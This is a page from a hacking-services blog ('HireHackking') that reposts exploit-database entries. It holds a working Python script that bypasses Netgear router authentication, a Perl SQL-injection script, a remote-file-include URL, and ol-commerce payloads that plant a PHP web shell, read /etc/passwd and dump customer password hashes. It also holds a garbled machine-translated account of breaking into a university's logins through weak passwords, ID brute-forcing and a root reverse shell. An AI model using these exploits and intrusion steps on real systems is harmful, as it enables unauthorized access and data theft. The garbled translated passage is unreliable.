Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863151860

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=620

I wanted to demonstrate that these iOS/OS X kernel race condition really are exploitable so here's a PoC
which gets RIP on OS X. The same techniques should transfer smoothly to iOS :)

The bug is here:

void IORegistryIterator::reset( void )
{
    while( exitEntry())
    {}
    
    if( done) {
        done->release();
        done = 0;
    }
    
    where->current = root;
    options &= ~kIORegistryIteratorInvalidFlag;
}

We can call this from userspace via the IOIteratorReset method.

done is an OSOrderedSet* and we only hold one reference on it; therefore we can race two threads
to both see the same value of done, one will free it but before it sets done to NULL the other will
call ->release on the now free'd OSOrderedSet.

How to get instruction pointer control?

The XNU kernel heap seems to have been designed to make this super easy :) When the first thread frees
done zalloc will overwrite the first qword of the allocation with the freelist next pointer (and the last qword
with that pointer xor'd with a secret.) This means that what used to be the vtable pointer gets overwritten
with a valid pointer pointing to the last object freed to this zone. If we can control that object then
the qword at +0x28 will be called (release is at offset +0x28 in the OSObject vtable which is the base
of all IOKit objects including OSOrderedSet.)

This PoC uses OSUnserializeXML to unserialize an OSData object with controlled contents then free it, which
puts a controlled heap allocation at the head of the kalloc.80 freelist giving us pretty easy instruction pointer control.

I've attached a panic log showing kernel RIP at 0xffffff8041414141. You will probably have to fiddle with the
PoC a bit to get it to work, it's only a PoC but it does work! (I have marked the value to fiddle with :) )

As a hardening measure I would strongly suggest at the very least flipping the location of the obfuscated and
unobfuscate freelist pointers such that the valid freelist pointer doesn't overlap with the location of the
vtable pointer.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39357.zip
HireHackking 
'''
# Exploit Title: Netgear_WNR1000v4_AuthBypass
# Google Dork: -
# Date: 06.10.2015
# Exploit Author: Daniel Haake
# Vendor Homepage: http://www.netgear.com/
# Software Link: http://downloadcenter.netgear.com/en/product/WNR1000v4
# Version: N300 router firmware versions 1.1.0.24 - 1.1.0.31
# Tested on: Can be exploited using a browser
# CVE : requested


Introduction:
-------------
Multiple NETGEAR wireless routers are out of the box vulnerable
to an authentication bypass attack. No router options has to
be changed to exploit the issue. So an attacker can access the administration
interface of the router without submitting any valid username and
password, just by requesting a special URL several times.


Affected:
---------
- Router Firmware: N300_1.1.0.31_1.0.1.img
- Router Firmware; N300-1.1.0.28_1.0.1.img
- Router Firmware; N300-1.1.0.24_1.0.1.img
- tested and confirmed on the WNR1000v4 Router with both firmwares
- other products may also be vulnerable because the firmware is used in multiple devices


Technical Description:
----------------------
The attacker can exploit the issue by using a browser or writing a simple exploit.
1. When a user wants to access the web interface, a http basic authentication login process is initiated
2. If he does not know the username and password he gets redirected to the 401_access_denied.htm file
3. An attacker now has to call the URL http://<ROUTER-IP>/BRS_netgear_success.html multiple times
-> After that if he can access the administration web interface and there is no username/password prompt


Example Python script:
----------------------
'''

import os
import urllib2
import time
import sys

try:
	first = urllib2.urlopen("http://" + sys.argv[1])
	print "No password protection!"
except:
	print "Password protection detected!"
	print "Executing exploit..."
	for i in range(0,3):
		time.sleep(1)
		urllib2.urlopen("http://" + sys.argv[1] + "/BRS_netgear_success.html")

	second = urllib2.urlopen("http://" + sys.argv[1])
	if second.getcode() == 200:
		print "Bypass successfull. Now use your browser to have a look at the admin interface."

'''
Workaround/Fix:
---------------
None so far. A patch already fixing this vulnerability was developed by Netgear but not released so far
(see timeline below).


Timeline:
---------
Vendor Status: works on patch-release
'''
21.07.2015: Vendor notified per email (security@netgear.com)
            -> No response
23.07.2015: Vendor notified via official chat support
24.07.2015: Support redirected notification to the technical team
29.07.2015: Requested status update and asked if they need further assistance
            -> No response
21.08.2015: Notified vendor that we will go full disclosure within 90 days if they do not react
03.09.2015: Support again said that they will redirect it to the technical team
03.09.2015: Netgear sent some beta firmware version to look if the vulnerability is fixed
03.09.2015: Confirmed to Netgear that the problem is solved in this version
            Asked Netgear when they plan to release the firmware with this security fix
11.09.2015: Response from Netgear saying they will not disclose the patch release day
15.09.2015: Asked Netgear again when they plan to publish the security fix for the second time
            -> No response
29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
06.10.2015: Forced public release of this advisory to follow up on [2]


References:
-----------
[1] http://support.netgear.com/product/WNR1000v4
[2] http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html
HireHackking 
# Title: Ramui web hosting directory script 4.0 Remote File Include Vulnerability
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com
# Download: http://ramui.com/directory-script/download-v4.html

Proof-of-Concept:
/gb/include/connection.php lines 6-13 in php-sourcecode
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class connection
{
protected $site;
public $error=false;
protected $admin=false;
function __construct($root)
{
        include $root."database/config.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The $root-parameter is a __construct.
But no value was passed to him.
Therefore, nothing can be checked before include in line 13.
So an attacker can execute malicious shellcode about it.
In this case, the __construct is meaningless.


[+]Exploit: http://[server]/path/gb/include/connection.php?root=[YourShellcode]


~~Everything revolves. Even the planet. :)~~
***Greetz to ALL my followers on Twitter!***

/bd0rk
HireHackking

0x01情報収集

まず、指定されたターゲットはxxx大学の公式ウェブサイト:wwwww.xxx.edu.cnですが、実際にはメインサイトだけをテストしないでください。一般に、このようなメインサイトは比較的安全であり、一部のサイトグループシステムを使用する可能性があります。多くの学校がBodaの統一管理を使用しています。

1.サブドメイン名収集

は、サブドメイン3、ファズドメイン、サブドメインブルート、seayサブドメイン名を爆破するために使用できます

しかし、私はこの浸透で上記を使用せず、爆破時間は長すぎました。

私はこれらのFOFA、Shadon、およびこれらのサイバースペース検索エンジンを使用しています

たとえば、次の写真:

host='xxxx.edu.cn'

1049983-20211227113000927-330798269.png

2.ポート情報

上記のFOFA結果を介して、ポートスキャンツールを使用してIPアドレスとスキャンを学習できます。利用可能なポートは見つかりません

1049983-20211227113001545-271321493.pngただし、多くのWebサイトにはこのIPがあります。

その後、ポートをあきらめます

3.感受性情報収集

Github検索GoogleハッキングLingfengyunネットワークディスク検索で、いくつかの繊細なものを収集しませんでした。メールアドレスはTencentの企業メールアドレスであり、VPNは次のようになります

1049983-20211227113002012-780205280.png収集されたメールアカウントの一部は次のとおりでした

1049983-20211227113002522-1932877496.png Webサイトを閲覧して、いくつかのイントラネットシステムのコルプス

1049983-20211227113002910-826391212.png統一認証プラットフォームのプロンプトを表示することにより、一部のソーシャルワーカーは、学生番号を使用してIDカードを追加した後に学生がログインできることを知っています(デフォルトのパスワード)

1049983-20211227113003277-1043885985.pngだから私は学生番号の波を収集してバックアップしました

site:xxx.edu.cn学生ID

1049983-20211227113003806-953939128.png

0x02脆弱性マイニング

必要な情報の一部を収集した後、各サブドメインを掘り始めました。長い間検索した後、ほとんどのシステムは、比較的単一の機能を備えた統一テンプレートを使用し、抜け穴は見つかりませんでした。

site:xxx.edu.cn inurl:login

site:xxx.edu.cn intitle:login

次に、いくつかのログインシステムに焦点を当てました

1049983-20211227113004297-51432281.pngその後、ログインするシステムが見つかりました

1049983-20211227113005484-1267946711.pngこの時点で、私は彼のプロンプトを思い出しました。ユーザー名とパスワードは私の仕事番号です。つまり、ここに教師の仕事番号情報があるかもしれませんが、私はただ幸運です。このシステムのシステム管理者アカウントは、パスワードが弱いです。

管理者が背景に入った後、ユーザー情報を見つけて、教師のアカウントが5桁であることを知ります。アドレスバーにアクションがあることがわかります。 STR2をテストした後、Webページを更新しましたが、開くことができませんでした。私は視覚的にIPがブロックされていることを発見しました.

1049983-20211227113006182-1245998393.png次に、ユーザーのルールを知った後、辞書のバックアップとして使用するスクリプトを書きました

#!/usr/bin/env python

# - * - Coding:UTF-8-* -

#DateTime :2019/7/10 8:44

begin_num=0#数字から開始パラメーター生成を開始します

end_num=20000#endパラメーター停止nthパラメーター

印刷( '' ''

スクリプトを実行した後、5.txtはスクリプトが配置されているディレクトリで生成され、生成された番号が保存されます。

'' ')

範囲のi(begin_num、end_num + 1):

I 10:の場合

i='0000' + str(i)

Elif I 100:

i='000' + str(i)

Elif I 1000:

i='00' + str(i)

Elif I 10000:

i='0'+str(i)

f: as open( '5.txt'、 'a')

f.write(str(i) + '\ n')

print( 'プログラムが実行され、ファイルが生成されました')

次に、この背景に注入を見つけてアップロードしましたが、それは実りがありませんでしたので、テキストに記録し、別のドメイン名に変更しました。

次に、コース選択システムをご覧ください

1049983-20211227113007332-2128193483.pngは、学生アカウントをアカウントのパスワードとして使用し、正常にログインすることです

1049983-20211227113007933-437052673.pngは役に立たないようですが、これについて気分が悪くなっているのは、テストをアップロードしたときにスクリプト形式の接尾辞を変更し、データパケットを送信できなかったことです。その結果、私は更新するためにWebページに戻り、リンクがリセットされました.そうです、私は再びIPで禁止されました.

それから私は教師アカウントを破ろうとしました、そして同じアカウントがパスワードとして使用されました

1049983-20211227113008565-396845587.png入った後、私は周りを見回しましたが、まだ進歩することができませんでした

同様に、私は大学院管理システムと学生支払いクエリシステムに入りました(実際にはただのクエリでした.)、最終的にFinancial XXシステムで少し進歩しました。

1049983-20211227113009097-54343001.pngはい、それを正しく読んで、ID番号を読んだので、私は精神遅滞で100回試してみて、IDカードを含む14の教師アカウントを取得しましたが、それらはすべて退職した教師のように見えます。

それから私はログインを試してみるために統一されたID認証プラットフォームに来ましたが、ログインしました.(アカデミックアフェアーズはログインできません)

1049983-20211227113009829-1664715923.pngここで始めましたが、これはブレークスルーと見なされました。このブレークスルーポイントなど、ここの一部のシステムは認証なしでは開くことができないため:アパートメント管理システム

認証前に:を開きます

1049983-20211227113010421-334649582.png認証後に開く:

1049983-20211227113010861-1929599002.png実際には許可がありません.クリックしてもう一度ログインすると、このシステム1049983-20211227113011223-68759536.pngにアクセスできます。これにより、このシステムは統一された認証プラットフォームにログインしたユーザーが使用できることも証明しました。その後、このシステムにはJavaの敏lialializationの脆弱性があることが起こります

したがって、この敏arialializationの脆弱性(Shiro Deserialization)を通じて、リバウンドシェルが取得され、マシンはルート許可です

1049983-20211227113012288-1191177806.pngその後、エージェントトラフィックはその背後にあります。犬の穴を使用する場合、これ以上の話を無駄にしません.

それから私は今まで見たことがないWAFを見つけました

1049983-20211227113014470-1342050748.png驚き、2番目のマスターが駅を守り、後退し、ごめんなさい、邪魔をしました。

0x03要約

1。情報収集サブドメイン名:FOFA(host='xxxx.edu.cn')ポートコレクション:Yujianスキャンツール、ウェブサイトは、逆プロキシポートを使用してポート443または80のみを使用して、ネットワークを出て敏感な情報を収集することができます。 Baidu Network Disk and Tencent Network Disk)3。Googハック学生番号を収集する番号:site3:xxx.cn学生番号ログイン:site:xxx.edu.cn inurl3360loginまたはsite:xxx.edu.edu.edu.edu.edu.cn intitle:log in subage cotain in homepain in homepain in homepain in to homepaint in home poight of of of of offution 3.統一された認証プラットフォームが作業番号とIDカードを使用し、作業番号とIDカードの後に6桁にログインしていることを発見します。資産と実験室のプラットフォームが、ユーザー名とパスワードとして作業番号を使用していることを発見します。ここでは、弱いパスワード管理者と管理者を介してシステムを入力して教師の作業番号を取得できます。システムには、WAF 5で傍受されます。コース選択センター、アカウント、パスワードの両方が生徒数と教師の作業番号であることを発見します。システムのファイルアップロードもWAFによって傍受されます。 6.大学院管理システム、学生支払いクエリシステム、Financial XXシステムなどのその他のシステムには、すべてのアカウントとパスワードがあります。それらはすべて、作業番号があり、システムに入ることができます。教師のアカウントにバインドされたID番号を収集できます。 7.教師のアカウントとID番号を取得し、統一された認証プラットフォームを入力します。寮管理システムにログインできます(最初に統一認証システムにログインする必要がある前提条件)8。

HireHackking 
# Title: Ramui forum script 9.0 SQL Injection Exploit
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com/
# Download: http://ramui.com/forum-script/download-v9.html
# Google-Dork: n/a --->Script-Kiddie protection! :)
# Direct SQL-Path: n/a --->Script-Kiddie protection! :)

# Description: I've found a sql-injection vulnerability in this web-software.
#             The vulnerable code is in /gb/include/page.php
#             The problem is the GET-pagename.
#             An attacker can use this exploitcode for unfiltered sql-queries.

                                      


#                                                    Vuln-Code in /gb/include/page.php:
#************************************************************************************************************************************
# <?php
# if(isset($_GET['pagename'])){
#	$name=$_GET['pagename'];
#	$query=sprintf("SELECT* FROM ".PREFIX."page WHERE pagename = '%s' AND publish = 'Y'",$xx_con->real_escape_string($name));
# }
#************************************************************************************************************************************



# [+]PERL-EXPLOITCODE(Copy&Paste):


#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                    +
+   Ramui forum script 9.0 SQL Injection Exploit     +
+                                                    +
+                  bd0rk || SOH-Crew                 +
+                                                    +
+            Greetings from cold Germany             +
+                                                    +
++++++++++++++++++++++++++++++++++++++++++++++++++++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /ramui/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "gb/include/page.php?pagename=[sqlInjectionCodeHERE]".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
HireHackking 
#####################################################################################

Application: VLC media player

Platforms: Windows

Versions: Version 2.2.1

Author: Francis Provencher of COSIG

Website: http://www.protekresearchlab.com/

Twitter: @COSIG_

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

VLC media player (commonly known as VLC) is a portable, free and open-source, cross-platform media player andstreaming media server written by the VideoLAN project. VLC is available for desktop operating systems as also mobile platforms as Android, iPad, iPhone, and iPod Touch. VLC is also available on App stores such as Apple’s App Store. VLC media player supports many audio and video compression methods and file formats, including DVD-Video, video CD and streaming protocols. It is able to stream media over computer networks and to transcode multimedia files.[10]

(https://en.wikipedia.org/wiki/VLC_media_player)

#####################################################################################

============================
2) Report Timeline
============================

2016-01-26: Francis Provencher from Protek Research Lab’s report the issue to VLC;
2016-01-27: Publication of this advisory;

#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of VLC.

User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

An heap memory corruption occured when VLC parsed an malformed MPEG-4 file that contain an invalid Sample Table and Sample Description (STSD) Atoms size. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.

#####################################################################################

===========

4) POC

===========

http://protekresearchlab.com/exploits/COSIG-2016-03.mp4
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39353.zip

###############################################################################
HireHackking 
source: https://www.securityfocus.com/bid/68719/info
        
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
        
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
        
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

Http://www.example.com/maint/modules/home/index.php?lang=MF;echo "<?php
system(\$_GET['cmd']);?> \$Greats 2 MY=\"Love:D">shell.php

Your Shell

Http://www.example.com/maint/modules/home/shell.php?cmd=id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2
MY="Love:D
HireHackking 
source: https://www.securityfocus.com/bid/68719/info
       
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
       
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
       
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

Http://www.example.com/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/68719/info
      
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
      
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
      
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

Http://www.example.com/maint/modules/repo/repo.php?lang=../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/68719/info
     
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
     
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
     
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

Http://www.example.com/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/68719/info
    
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
    
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
    
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

Http://www.example.com/maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/68720/info

Trixbox is prone to the following security vulnerabilities:

1. An SQL-injection vulnerability
2. A cross-site scripting vulnerability
3. Multiple local file-include vulnerabilities
4. A remote code-execution vulnerability

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, to steal cookie-based authentication credentials, exploit latent vulnerabilities in the underlying database or perform certain unauthorized actions and gain access to the affected application. 

Http://www.example.com/maint/modules/endpointcfg/endpoint_generic.php?action=Submit&mac=1' and 1=2 union select 1,2,3,4,5,6-- -
HireHackking 
source: https://www.securityfocus.com/bid/68719/info
   
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
   
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
   
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/OL-Commerce/admin/create_account.php?action=edit

POST /OL-Commerce/admin/create_account.php?action=edit  HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://www.example.com/OL-Commerce/admin/create_account.php?action=edit
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

default_address_id=&customers_gender=m&csID=100&customers_firstname=aaaa
&customers_lastname=bbbb&customers_email_address=email@hotmail.com
&entry_company=cccc&customers_vat_id=1212&entry_street_address=dddd
&entry_postcode=00961&entry_city=eeee&entry_country_id=118[SQL INJECTION]
&customers_telephone=12121233&customers_fax=23421424&status=0
&customers_mail=yes&payment_unallowed=&shipping_unallowed=
&entry_password=12121212&mail_comments=

[NOTE]
------
entry_country_id=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -
HireHackking 
source: https://www.securityfocus.com/bid/68719/info
  
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
  
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/OL-Commerce/create_account.php

POST /OL-Commerce/create_account.php  HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/OL-Commerce/create_account.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301


action=process&gender=m&firstname=aaaaa&lastname=bbbb
&dob=17.05.1991&email_address=email@hotmail.com
&company=ccc&vat=1234&street_address=dddd&suburb=eeee
&postcode=00961&city=fffff&state=gggggg
&country=118[SQL
INJECTION]&telephone=45345325&fax=234234&password=12121212&confirmation=12121212&x=28&y=4

[NOTE]
------
country=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -
HireHackking 
source: https://www.securityfocus.com/bid/68719/info
 
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 


http://www.example.com/OL-Commerce/affiliate_show_banner.php?ref=1&affiliate_banner_id=1[SQL INJECTION]
HireHackking 
source: https://www.securityfocus.com/bid/68719/info

ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/OL-Commerce/affiliate_signup.php

POST /OL-Commerce/affiliate_signup.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/o/affiliate_signup.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 629

action=process&a_gender=m&a_firstname=haha&a_lastname=hahasdf&a_dob=457689
&a_email_address=email@hotmail.com&a_company=iiiiii&a_company_taxid=12
&a_payment_check=jjjjjj&a_payment_paypal=email@hotmail.com
&a_payment_bank_name=paypal
&a_payment_bank_branch_number=555555&a_payment_bank_swift_code=444444
&a_payment_bank_account_name=qqqqqq&a_payment_bank_account_number=3333333
&a_street_address=ddddddd&a_suburb=ccccccf&a_postcode=00961&a_city=bbbbbb
&a_country=118[SQL
INJECTION]&a_state=aaaaaa&a_telephone=22222222&a_fax=11111111&
a_homepage=http://iphobos.com/blog&a_password=12121212
&a_confirmation=12121212&a_agb=1&x=65&y=3


[NOTE]
------
a_country=118[SQL INJECTION]=118' and 1=2 union all select
group_concat(customers_id,0x3a,customers_email_address,0x3a,customers_password)+from+customers--
HireHackking 
# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
# Date: 2016-01-28
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.1.24
# OWASP Top10: A1-Injection
# Tested on: windows 10 + firefox + sqlmap 1.0.

===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
a calendar**. The booking form is linked to a **PayPal** payment process.

You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
that can be accepted for each time-slot."

(copy of readme file)


======================
EXPLOITATION TECHNIQUE
======================
remote

==============
SEVERITY LEVEL
==============

critical

================================
TECHNICAL DETAILS && DESCRIPTION
================================

A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.

The flaw were found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
The action is added with ´init´ tag, so it function is called every time when parameter 
´action=cpabc_appointments_calendar_update´ appear in the query string (GET request) or POST request.

Exploiting succesful this vulnerability we need a vulnerable wordpress site with especial character set for to bypass
the ´addslashes´ function (called automatically and applied in all variables $_POST and $_GET by wordpress ´wp_magic_quotes´
function) and we need own a calendar too (could be owned by privilege escalation) or be a user with ´edit_pages´ permission (admin|editor).

The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, an attacker
can compromise the entire web server.

================
PROOF OF CONCEPT
================

An unauthenticated attacker can make a request like...

http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
&cpabc_calendar_update=1&id=<owned calendar id>

Example:

	Exploiting simple SQL injection:

	http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
	&cpabc_calendar_update=1&id=1
	
	Post data:
	specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
	&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5&	imeWorkingDates6  

All post variables are vulnerable to SQLi with ´addslashes´ bypass.

===============
VULNERABLE CODE
===============

located in ´cpabc_appointments.php´

function cpabc_appointments_calendar_update() {
    global $wpdb, $user_ID;

	if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
		return;

    $calid = intval(str_replace  (CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
    if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
        return;
echo "sa";
    cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');

    //@ob_clean();
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");
    if ( $user_ID )    
        $wpdb->query("update  ".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
		.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
		"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
		CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
		.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
		.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
		."='".$_POST["timeWorkingDates6"]."'  where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);

    exit();
}


===========


Note:
cpabc_appointments_calendar_update2() function is vulnerable too by the same exploit explaned here.


==========
 CREDITS
==========

Vulnerability discovered by:
	Joaquin Ramirez Martinez [i0 security-lab]
	strparser[at]gmail[dot]com
	https://www.facebook.com/I0-security-lab-524954460988147/
	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
2016-01-27 released plugin version 1.1.25
2016-01-28 public disclousure
HireHackking 
# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - Privilege escalation (Managing calendars) & Persistent XSS
# Date: 2016-01-28
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.1.24
# Tested on: windows 10 + firefox + sqlmap 1.0.

===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
a calendar**. The booking form is linked to a **PayPal** payment process.

You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
that can be accepted for each time-slot."

(copy of readme file)


======================
EXPLOITATION TECHNIQUE
======================
remote

==============
SEVERITY LEVEL
==============

medium

